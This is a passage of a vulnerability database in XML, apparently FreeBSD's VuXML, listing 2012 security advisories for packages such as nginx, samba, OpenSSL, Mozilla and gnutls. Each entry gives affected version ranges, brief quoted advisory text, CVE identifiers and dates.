<p>Failing to properly encode the output, the default TYPO3
Exception Handler is susceptible to Cross-Site Scripting. We
are not aware of a possibility to exploit this vulnerability
without third party extensions being installed that put user
input in exception messages. However, it has come to our
attention that extensions using the extbase MVC framework can
be used to exploit this vulnerability if these extensions
accept objects in controller actions.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2112</cvename>
<url>https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-002/</url>
</references>
<dates>
<discovery>2012-04-17</discovery>
<entry>2012-04-18</entry>
</dates>
</vuln>
<vuln vid="0c14dfa7-879e-11e1-a2a0-00500802d8f7">
<topic>nginx -- Buffer overflow in the ngx_http_mp4_module</topic>
<affects>
<package>
<name>nginx</name>
<range><lt>1.0.15</lt></range>
</package>
<package>
<name>nginx-devel</name>
<range><lt>1.1.19</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The nginx project reports:</p>
<blockquote cite="http://nginx.org/en/security_advisories.html">
<p>Buffer overflow in the ngx_http_mp4_module</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2089</cvename>
<url>http://nginx.org/en/security_advisories.html</url>
</references>
<dates>
<discovery>2012-04-12</discovery>
<entry>2012-04-16</entry>
</dates>
</vuln>
<vuln vid="c80a3d93-8632-11e1-a374-14dae9ebcf89">
<topic>phpmyfaq -- Remote PHP Code Execution Vulnerability</topic>
<affects>
<package>
<name>phpmyfaq</name>
<range><lt>2.7.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyFAQ project reports:</p>
<blockquote cite="http://www.phpmyfaq.de/advisory_2011-10-25.php">
<p>The bundled ImageManager library allows injection of arbitrary
PHP code to execute arbitrary PHP code and upload malware and
trojan horses.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.phpmyfaq.de/advisory_2012-04-14.php</url>
</references>
<dates>
<discovery>2012-04-14</discovery>
<entry>2012-04-14</entry>
</dates>
</vuln>
<vuln vid="607d2108-a0e4-423a-bf78-846f2a8f01b0">
<topic>puppet -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>puppet</name>
<range><gt>2.7.*</gt><lt>2.7.12_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://puppetlabs.com/security/">
<p>Multiple vulnerabilities exist in puppet that can result in
arbitrary code execution, arbitrary file read access, denial of
service, and arbitrary file write access. Please review the
details in each of the CVEs for additional information.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1906</cvename>
<cvename>CVE-2012-1986</cvename>
<cvename>CVE-2012-1987</cvename>
<cvename>CVE-2012-1988</cvename>
<cvename>CVE-2012-1989</cvename>
<url>http://puppetlabs.com/security/cve/cve-2012-1906/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-1986/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-1987/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-1988/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-1989/</url>
</references>
<dates>
<discovery>2012-03-26</discovery>
<entry>2012-04-10</entry>
</dates>
</vuln>
<vuln vid="baf37cd2-8351-11e1-894e-00215c6a37bb">
<topic>samba -- "root" credential remote code execution</topic>
<affects>
<package>
<name>samba34</name>
<range><gt>3.4.*</gt><lt>3.4.16</lt></range>
</package>
<package>
<name>samba35</name>
<range><gt>3.5.*</gt><lt>3.5.14</lt></range>
</package>
<package>
<name>samba36</name>
<range><gt>3.6.*</gt><lt>3.6.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Samba development team reports:</p>
<blockquote cite="http://www.samba.org/samba/security/CVE-2012-1182">
<p>Samba versions 3.6.3 and all versions previous to this
are affected by a vulnerability that allows remote code
execution as the "root" user from an anonymous connection.</p>
<p>As this does not require an authenticated connection it
is the most serious vulnerability possible in a program,
and users and vendors are encouraged to patch their Samba
installations immediately.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1182</cvename>
</references>
<dates>
<discovery>2012-04-10</discovery>
<entry>2012-04-10</entry>
</dates>
</vuln>
<vuln vid="7f448dc1-82ca-11e1-b393-20cf30e32f6d">
<topic>bugzilla Cross-Site Request Forgery</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>4.0.0</ge><lt>4.0.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/4.0.4/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<ul>
<li>Due to a lack of validation of the enctype form attribute
when making POST requests to xmlrpc.cgi, a possible CSRF
vulnerability was discovered. If a user visits an HTML page
with some malicious HTML code in it, an attacker could make
changes to a remote Bugzilla installation on behalf of the
victim's account by using the XML-RPC API on a site running
mod_perl. Sites running under mod_cgi are not affected.
Also, the user would have had to be already logged in to the
target site for the vulnerability to work.</li>
</ul>
<p>All affected installations are encouraged to upgrade as soon
as possible.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0453</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=725663</url>
</references>
<dates>
<discovery>2012-02-22</discovery>
<entry>2012-04-10</entry>
</dates>
</vuln>
<vuln vid="20923a0d-82ba-11e1-8d7b-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.2r202.228</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-07.html">
<p>Multiple Priority 2 vulnerabilities could cause a crash and
potentially allow an attacker to take control of the affected
system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0724</cvename>
<cvename>CVE-2012-0725</cvename>
<cvename>CVE-2012-0772</cvename>
<cvename>CVE-2012-0773</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-07.html</url>
</references>
<dates>
<discovery>2012-04-05</discovery>
<entry>2012-04-10</entry>
</dates>
</vuln>
<vuln vid="262b92fe-81c8-11e1-8899-001ec9578670">
<topic>png -- memory corruption/possible remote code execution</topic>
<affects>
<package>
<name>png</name>
<name>linux-f10-png</name>
<range><lt>1.4.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PNG project reports:</p>
<blockquote cite="http://www.libpng.org/pub/png/libpng.html">
<p>libpng fails to correctly handle malloc() failures for text
chunks (in png_set_text_2()), which can lead to memory
corruption and the possibility of remote code execution.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3048</cvename>
<url>http://www.libpng.org/pub/png/libpng.html</url>
</references>
<dates>
<discovery>2012-03-29</discovery>
<entry>2012-04-08</entry>
</dates>
</vuln>
<vuln vid="462e2d6c-8017-11e1-a571-bcaec565249c">
<topic>freetype -- multiple vulnerabilities</topic>
<affects>
<package>
<name>freetype2</name>
<range><lt>2.4.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Freetype project reports:</p>
<blockquote cite="https://sourceforge.net/projects/freetype/files/freetype2/2.4.9/README/view">
<p>Multiple vulnerabilities exist in freetype that can result in
application crashes and remote code execution. Please review
the details in each of the CVEs for additional information.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1126</cvename>
<cvename>CVE-2012-1127</cvename>
<cvename>CVE-2012-1128</cvename>
<cvename>CVE-2012-1129</cvename>
<cvename>CVE-2012-1130</cvename>
<cvename>CVE-2012-1131</cvename>
<cvename>CVE-2012-1132</cvename>
<cvename>CVE-2012-1133</cvename>
<cvename>CVE-2012-1134</cvename>
<cvename>CVE-2012-1135</cvename>
<cvename>CVE-2012-1136</cvename>
<cvename>CVE-2012-1137</cvename>
<cvename>CVE-2012-1138</cvename>
<cvename>CVE-2012-1139</cvename>
<cvename>CVE-2012-1140</cvename>
<cvename>CVE-2012-1141</cvename>
<cvename>CVE-2012-1142</cvename>
<cvename>CVE-2012-1143</cvename>
<cvename>CVE-2012-1144</cvename>
<url>https://sourceforge.net/projects/freetype/files/freetype2/2.4.9/README/view</url>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=806270</url>
</references>
<dates>
<discovery>2012-03-08</discovery>
<entry>2012-04-06</entry>
</dates>
</vuln>
<vuln vid="49314321-7fd4-11e1-9582-001b2134ef46">
<topic>mutt-devel -- failure to check SMTP TLS server certificate</topic>
<affects>
<package>
<name>mutt-devel</name>
<range><lt>1.5.21_4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Dave B reports on Full Disclosure:</p>
<blockquote cite="http://seclists.org/fulldisclosure/2011/Mar/87">
<p>It seems that mutt fails to check the validity of a SMTP
servers certificate during a TLS connection. [...]
This means that an attacker could potentially MITM a
mutt user connecting to their SMTP server even when the
user has forced a TLS connection.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-1429</cvename>
<url>http://seclists.org/fulldisclosure/2011/Mar/87</url>
</references>
<dates>
<discovery>2012-03-08</discovery>
<entry>2012-04-06</entry>
</dates>
</vuln>
<vuln vid="7289214f-7c55-11e1-ab3b-000bcdf0a03b">
<topic>libpurple -- Remote DoS via an MSN OIM message that lacks UTF-8 encoding</topic>
<affects>
<package>
<name>libpurple</name>
<range><lt>2.10.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>US-CERT reports:</p>
<blockquote cite="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1178">
<p>The msn_oim_report_to_user function in oim.c in the MSN protocol
plugin in libpurple in Pidgin before 2.10.2 allows remote servers
to cause a denial of service (application crash) via an OIM message
that lacks UTF-8 encoding.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1178</cvename>
</references>
<dates>
<discovery>2012-03-15</discovery>
<entry>2012-04-01</entry>
</dates>
</vuln>
<vuln vid="a81161d2-790f-11e1-ac16-e0cb4e266481">
<topic>phpMyAdmin -- Path disclosure due to missing verification of file presence</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><gt>3.4</gt><lt>3.4.10.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-2.php">
<p>The show_config_errors.php scripts did not validate the presence
of the configuration file, so an error message shows the full path
of this file, leading to possible further attacks. For the error
messages to be displayed, php.ini's error_reporting must be set to
E_ALL and display_errors must be On (these settings are not
recommended on a production server in the PHP manual).</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1902</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-2.php</url>
</references>
<dates>
<discovery>2012-03-28</discovery>
<entry>2012-03-28</entry>
</dates>
</vuln>
<vuln vid="60f81af3-7690-11e1-9423-00235a5f2c9a">
<topic>raptor/raptor2 -- XXE in RDF/XML File Interpretation</topic>
<affects>
<package>
<name>raptor2</name>
<range><lt>2.0.7</lt></range>
</package>
<package>
<name>raptor</name>
<range><lt>1.4.21_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Timothy D. Morgan reports:</p>
<blockquote cite="http://www.vsecurity.com/resources/advisory/20120324-1/">
<p>In December 2011, VSR identified a vulnerability in multiple open
source office products (including OpenOffice, LibreOffice, KOffice,
and AbiWord) due to unsafe interpretation of XML files with custom
entity declarations. Deeper analysis revealed that the
vulnerability was caused by acceptance of external entities by the
libraptor library, which is used by librdf and is in turn used by
these office products.</p>
<p>In the context of office applications, these vulnerabilities could
allow for XML External Entity (XXE) attacks resulting in file theft
and a loss of user privacy when opening potentially malicious ODF
documents. For other applications which depend on librdf or
libraptor, potentially serious consequences could result from
accepting RDF/XML content from untrusted sources, though the impact
may vary widely depending on the context.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0037</cvename>
<url>http://seclists.org/fulldisclosure/2012/Mar/281</url>
<url>http://www.vsecurity.com/resources/advisory/20120324-1/</url>
</references>
<dates>
<discovery>2012-03-24</discovery>
<entry>2012-03-25</entry>
</dates>
</vuln>
<vuln vid="42a2c82a-75b9-11e1-89b4-001ec9578670">
<topic>quagga -- multiple vulnerabilities</topic>
<affects>
<package>
<name>quagga</name>
<range><lt>0.99.20.1</lt></range>
</package>
<package>
<name>quagga-re</name>
<range><lt>0.99.17.8</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>CERT reports:</p>
<blockquote cite="http://www.kb.cert.org/vuls/id/551715">
<p>The ospfd implementation of OSPF in Quagga allows a remote
attacker (on a local network segment with OSPF enabled) to cause
a denial of service (daemon aborts due to an assert) with a
malformed OSPF LS-Update message.</p>
<p>The ospfd implementation of OSPF in Quagga allows a remote
attacker (on a local network segment with OSPF enabled) to cause
a denial of service (daemon crash) with a malformed OSPF Network-
LSA message.</p>
<p>The bgpd implementation of BGP in Quagga allows remote attackers
to cause a denial of service (daemon aborts due to an assert) via
BGP Open message with an invalid AS4 capability.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0249</cvename>
<cvename>CVE-2012-0250</cvename>
<cvename>CVE-2012-0255</cvename>
<url>http://www.kb.cert.org/vuls/id/551715</url>
</references>
<dates>
<discovery>2012-03-23</discovery>
<entry>2012-03-24</entry>
<modified>2012-03-26</modified>
</dates>
</vuln>
<vuln vid="acab2f88-7490-11e1-865f-00e0814cab4e">
<topic>Apache Traffic Server -- heap overflow vulnerability</topic>
<affects>
<package>
<name>trafficserver</name>
<range><lt>3.0.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>CERT-FI reports:</p>
<blockquote cite="https://www.cert.fi/en/reports/2012/vulnerability612884.html">
<p>A heap overflow vulnerability has been found in the HTTP
(Hypertext Transfer Protocol) protocol handling of Apache
Traffic Server. The vulnerability allows an attacker to cause
a denial of service or potentially to execute his own code by
sending a specially modified HTTP message to an affected
server.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0256</cvename>
</references>
<dates>
<discovery>2012-03-22</discovery>
<entry>2012-03-24</entry>
</dates>
</vuln>
<vuln vid="2e7e9072-73a0-11e1-a883-001cc0a36e12">
<topic>libtasn1 -- ASN.1 length decoding vulnerability</topic>
<affects>
<package>
<name>libtasn1</name>
<range><lt>2.12</lt></range>
</package>
<package>
<name>gnutls</name>
<range><lt>2.12.18</lt></range>
</package>
<package>
<name>gnutls-devel</name>
<range><gt>2.99</gt><lt>3.0.16</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Mu Dynamics, Inc. reports:</p>
<blockquote cite="http://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/5959">
<p>Various functions using the ASN.1 length decoding logic in
Libtasn1 were incorrectly assuming that the return value from
asn1_get_length_der is always less than the length of the
enclosing ASN.1 structure, which is only true for valid
structures and not for intentionally corrupt or otherwise
buggy structures.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1569</cvename>
</references>
<dates>
<discovery>2012-03-20</discovery>
<entry>2012-03-21</entry>
<modified>2012-03-24</modified>
</dates>
</vuln>
<vuln vid="aecee357-739e-11e1-a883-001cc0a36e12">
<topic>gnutls -- possible overflow/Denial of service vulnerabilities</topic>
<affects>
<package>
<name>gnutls</name>
<range><lt>2.12.18</lt></range>
</package>
<package>
<name>gnutls-devel</name>
<range><gt>2.99</gt><lt>3.0.15</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Mu Dynamics, Inc. reports:</p>
<blockquote cite="http://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/5959">
<p>The block cipher decryption logic in GnuTLS assumed that a
record containing any data which was a multiple of the block
size was valid for further decryption processing, leading to
a heap corruption vulnerability.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1573</cvename>
</references>
<dates>
<discovery>2012-03-20</discovery>
<entry>2012-03-21</entry>
<modified>2012-03-24</modified>
</dates>
</vuln>
<vuln vid="0d530174-6eef-11e1-afd6-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk14</name>
<range><gt>1.4.*</gt><lt>1.4.44</lt></range>
</package>
<package>
<name>asterisk16</name>
<range><gt>1.6.*</gt><lt>1.6.2.23</lt></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.10.1</lt></range>
</package>
<package>
<name>asterisk10</name>
<range><gt>10.*</gt><lt>10.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Stack Buffer Overflow in HTTP Manager</p>
<p>Remote Crash Vulnerability in Milliwatt Application</p>
</blockquote>
</body>
</description>
<references>
<url>http://downloads.asterisk.org/pub/security/AST-2012-002.html</url>
<url>http://downloads.asterisk.org/pub/security/AST-2012-003.html</url>
</references>
<dates>
<discovery>2012-03-15</discovery>
<entry>2012-03-15</entry>
</dates>
</vuln>
<vuln vid="60eb344e-6eb1-11e1-8ad7-00e0815b8da8">
<topic>OpenSSL -- CMS and S/MIME Bleichenbacher attack</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.0_10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenSSL Team reports:</p>
<blockquote cite="http://www.openssl.org/news/secadv_20120312.txt">
<p>A weakness in the OpenSSL CMS and PKCS #7 code can be exploited
using Bleichenbacher's attack on PKCS #1 v1.5 RSA padding
also known as the million message attack (MMA).</p>
<p>Only users of CMS, PKCS #7, or S/MIME decryption operations are
affected. A successful attack needs on average 2^20 messages. In
practice only automated systems will be affected as humans will
not be willing to process this many messages.</p>
<p>SSL/TLS applications are *NOT* affected by this problem since
the SSL/TLS code does not use the PKCS#7 or CMS decryption
code.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0884</cvename>
<url>http://www.openssl.org/news/secadv_20120312.txt</url>
</references>
<dates>
<discovery>2012-03-12</discovery>
<entry>2012-03-15</entry>
</dates>
</vuln>
<vuln vid="29194cb8-6e9f-11e1-8376-f0def16c5c1b">
<topic>nginx -- potential information leak</topic>
<affects>
<package>
<name>nginx</name>
<range><lt>1.0.14,1</lt></range>
</package>
<package>
<name>nginx-devel</name>
<range><lt>1.1.17</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>nginx development team reports:</p>
<blockquote cite="http://nginx.net/CHANGES">
<p>Matthew Daley recently discovered a security problem
which may lead to a disclosure of previously freed memory
on specially crafted response from an upstream server,
potentially resulting in sensitive information leak.</p>
</blockquote>
</body>
</description>
<references>
<url>http://nginx.net/CHANGES</url>
</references>
<dates>
<discovery>2012-03-15</discovery>
<entry>2012-03-15</entry>
</dates>
</vuln>
<vuln vid="a1050b8b-6db3-11e1-8b37-0011856a6e37">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>4.0,1</gt><lt>10.0.3,1</lt></range>
<range><ge>3.6.*,1</ge><lt>3.6.28</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.3,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.8</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.3</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.8</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>4.0</gt><lt>10.0.3</lt></range>
<range><gt>3.1.*</gt><lt>3.1.20</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>1.9.2.28</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-13 XSS with Drag and Drop and Javascript: URL</p>
<p>MFSA 2012-14 SVG issues found with Address Sanitizer</p>
<p>MFSA 2012-15 XSS with multiple Content Security Policy headers</p>
<p>MFSA 2012-16 Escalation of privilege with Javascript: URL as home page</p>
<p>MFSA 2012-17 Crash when accessing keyframe cssText after dynamic modification</p>
<p>MFSA 2012-18 window.fullScreen writeable by untrusted content</p>
<p>MFSA 2012-19 Miscellaneous memory safety hazards (rv:11.0/ rv:10.0.3 / rv:1.9.2.28)</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0451</cvename>
<cvename>CVE-2012-0455</cvename>
<cvename>CVE-2012-0456</cvename>
<cvename>CVE-2012-0457</cvename>
<cvename>CVE-2012-0458</cvename>
<cvename>CVE-2012-0459</cvename>
<cvename>CVE-2012-0460</cvename>
<cvename>CVE-2012-0461</cvename>
<cvename>CVE-2012-0462</cvename>
<cvename>CVE-2012-0463</cvename>
<cvename>CVE-2012-0464</cvename>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-13.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-14.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-15.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-16.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-17.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-18.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-19.html</url>
</references>
<dates>
<discovery>2012-03-13</discovery>
<entry>2012-03-14</entry>
<modified>2012-03-18</modified>
</dates>
</vuln>
<vuln vid="6d329b64-6bbb-11e1-9166-001e4f0fb9b1">
<topic>portaudit -- auditfile remote code execution</topic>
<affects>
<package>
<name>portaudit</name>
<range><lt>0.6.0</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Michael Gmelin and Jörg Scheinert has reported a remote
command execution vulnerability in portaudit.</p>
<p>An attacker who can get the user to use a specially crafted
audit file will be able to run commands on the users system,
with the privileges of the user running running portaudit
(often root).</p>
<p>The attack could e.g. happen through DNS hijacking or a man
in the middle attack.</p>
<p>Note that if the user has set up portaudit to run from
periodic this attack could happen without direct user
interaction.</p>
<p>In the FreeBSD Ports Collection (bsd.port.mk) the check for
vulnerable ports at install-time directly operates on the
auditfile and has the same vulnerability as portaudit. As
the Ports Collection infrastructure does not have a version
number just be sure to have a Ports Collection new enough to
contain the fix for portaudit. Note that this is <em>only</em>
a problem for users which has portaudit installed, as they will
not have the audit database installed or downloaded
otherwise.</p>
</body>
</description>
<references>
<url>http://cvsweb.FreeBSD.org/ports/ports-mgmt/portaudit/Makefile#rev1.30</url>
<url>http://cvsweb.FreeBSD.org/ports/Mk/bsd.port.mk#rev1.707</url>
</references>
<dates>
<discovery>2012-03-11</discovery>
<entry>2012-03-11</entry>
</dates>
</vuln>
<vuln vid="9da3834b-6a50-11e1-91af-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.1r102.63</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-05.html">
<p>These vulnerabilities could cause a crash and potentially allow
an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0768</cvename>
<cvename>CVE-2012-0769</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-05.html</url>
</references>
<dates>
<discovery>2012-03-05</discovery>
<entry>2012-03-09</entry>
</dates>
</vuln>
<vuln vid="9448a82f-6878-11e1-865f-00e0814cab4e">
<topic>jenkins -- XSS vulnerability</topic>
<affects>
<package>
<name>jenkins</name>
<range><lt>1.453</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jenkins Security Advisory reports:</p>
<blockquote cite="https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-03-05">
<p>An XSS vulnerability was found in Jenkins core, which allows an
attacker to inject malicious HTMLs to pages served by Jenkins.
This allows an attacker to escalate his privileges by hijacking
sessions of other users. This vulnerability affects all
versions.</p>
</blockquote>
</body>
</description>
<references>
<url>https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-03-05</url>
</references>
<dates>
<discovery>2012-03-05</discovery>
<entry>2012-03-07</entry>
</dates>
</vuln>
<vuln vid="eba70db4-6640-11e1-98af-00262d8b701d">
<topic>dropbear -- arbitrary code execution</topic>
<affects>
<package>
<name>dropbear</name>
<range><ge>0.51</ge><lt>2012.55</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Dropbear project reports:</p>
<blockquote cite="http://xforce.iss.net/xforce/xfdb/73444">
<p>Dropbear SSH Server could allow a remote authenticated attacker
to execute arbitrary code on the system, caused by a use-after-
free error. If a command restriction is enforced, an attacker
could exploit this vulnerability to execute arbitrary code on
the system with root privileges.</p>
</blockquote>
</body>
</description>
<references>
<bid>52159</bid>
<cvename>CVE-2012-0920</cvename>
<url>http://secunia.com/advisories/48147</url>
<url>http://xforce.iss.net/xforce/xfdb/73444</url>
</references>
<dates>
<discovery>2012-02-22</discovery>
<entry>2012-03-04</entry>
</dates>
</vuln>
<vuln vid="46aeba13-64a1-11e1-bc16-0023ae8e59f0">
<topic>openx -- undisclosed security issue</topic>
<affects>
<package>
<name>openx</name>
<range><lt>2.8.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OpenX does not provide information about vulnerabilities beyond their
existence.</p>
</body>
</description>
<references>
<url>http://blog.openx.org/12/security-matters-3</url>
</references>
<dates>
<discovery>2011-12-01</discovery>
<entry>2012-03-02</entry>
<modified>2012-07-08</modified>
</dates>
</vuln>
<vuln vid="174b8864-6237-11e1-be18-14dae938ec40">
<topic>databases/postgresql*-client -- multiple vulnerabilities</topic>
<affects>
<package>
<name>postgresql-client</name>
<range><lt>8.3.18</lt></range>
<range><ge>8.4</ge><lt>8.4.11</lt></range>
<range><ge>9</ge><lt>9.0.7</lt></range>
<range><ge>9.1</ge><lt>9.1.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PostgreSQL Global Development Group reports:</p>
<blockquote cite="http://www.postgresql.org/about/news/1377/">
<p>These vulnerabilities could allow users to define triggers that
execute functions on which the user does not have EXECUTE
permission, allow SSL certificate spoofing and allow line breaks
in object names to be exploited to execute code when loading a
pg_dump file.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0866</cvename>
<cvename>CVE-2012-0867</cvename>
<cvename>CVE-2012-0868</cvename>
<url>http://www.postgresql.org/about/news/1377/</url>
</references>
<dates>
<discovery>2012-02-27</discovery>
<entry>2012-02-28</entry>
</dates>
</vuln>
<vuln vid="f63bf080-619d-11e1-91af-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.1r102.62</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-03.html">
<p>These vulnerabilities could cause a crash and potentially allow
an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0751</cvename>
<cvename>CVE-2012-0752</cvename>
<cvename>CVE-2012-0753</cvename>
<cvename>CVE-2012-0754</cvename>
<cvename>CVE-2012-0755</cvename>
<cvename>CVE-2012-0756</cvename>
<cvename>CVE-2012-0767</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-03.html</url>
</references>
<dates>
<discovery>2012-02-15</discovery>
<entry>2012-02-27</entry>
</dates>
</vuln>
<vuln vid="57f1a624-6197-11e1-b98c-bcaec565249c">
<topic>libxml2 -- heap buffer overflow</topic>
<affects>
<package>
<name>libxml2</name>
<name>linux-f10-libxml2</name>
<range><lt>2.7.8_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Google chrome team reports:</p>
<blockquote cite="http://googlechromereleases.blogspot.com/2012/01/stable-channel-update.html">
<p>Heap-based buffer overflow in libxml2, allows remote attackers
to cause a denial of service or possibly have unspecified other
impact via unknown vectors.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3919</cvename>
<url>http://googlechromereleases.blogspot.com/2012/01/stable-channel-update.html</url>
</references>
<dates>
<discovery>2012-01-05</discovery>
<entry>2012-02-27</entry>
</dates>
</vuln>
<vuln vid="ba51c2f7-5b43-11e1-8288-00262d5ed8ee">
<topic>plib -- remote code execution via buffer overflow</topic>
<affects>
<package>
<name>torcs</name>
<range><lt>1.3.3</lt></range>
</package>
<package>
<name>plib</name>
<range><le>1.8.5_3</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://secunia.com/advisories/47297/">
<p>A vulnerability has been discovered in PLIB, which can be
exploited by malicious people to compromise an application using
the library.</p>
<p>The vulnerability is caused due to a boundary error within the
"ulSetError()" function (src/util/ulError.cxx) when creating the
error message, which can be exploited to overflow a static
buffer.</p>
<p>Successful exploitation allows the execution of arbitrary code
but requires that the attacker can e.g. control the content of
an overly long error message passed to the "ulSetError()"
function.</p>
<p>The vulnerability is confirmed in version 1.8.5. Other versions
may also be affected.</p>
